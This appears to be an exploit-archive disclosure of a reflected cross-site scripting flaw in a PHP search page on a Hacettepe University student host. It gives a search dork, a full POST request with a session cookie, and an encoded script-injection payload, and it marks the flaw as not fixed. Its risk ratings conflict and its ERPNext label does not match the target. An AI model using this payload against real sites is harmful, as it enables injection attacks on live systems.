lidya hacettepe Cross Site Scripting

2020.01.07

Anonymous7480 (TR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: allintext:"lidya.hacettepe.edu.tr"

Name: lidya.hacettepe.edu.tr Cross-site Scripting Vulnerabilities in ERPNext
Vendor Homepage: lidya.hacettepe.edu.tr
Vulnerability Type: Reflected Cross-site Scripting
Severity: High
Status: NOTFixed
----------------------------------------------------------------------------------------------------------------------------------------------
Request Headers

POST /~ahmett10/bto316/ilac/ilaclar.php HTTP/1.1
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=52hvvq2g6l8qu0slfojti0aub1
Host: lidya.hacettepe.edu.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
---------------------------------------------------------------------------------------------------------------------------------------------
alert here =>
ara=Ara&bul=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28956925%29%3c%2fScRiPt%3e&sec=t_ilac.adi
----------------------------------------------------------------------------------------------------------------------------------------------

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

lidya hacettepe Cross Site Scripting

Dork: allintext:"lidya.hacettepe.edu.tr"

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

lidya hacettepe Cross Site Scripting

Dork: allintext:"lidya.hacettepe.edu.tr"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.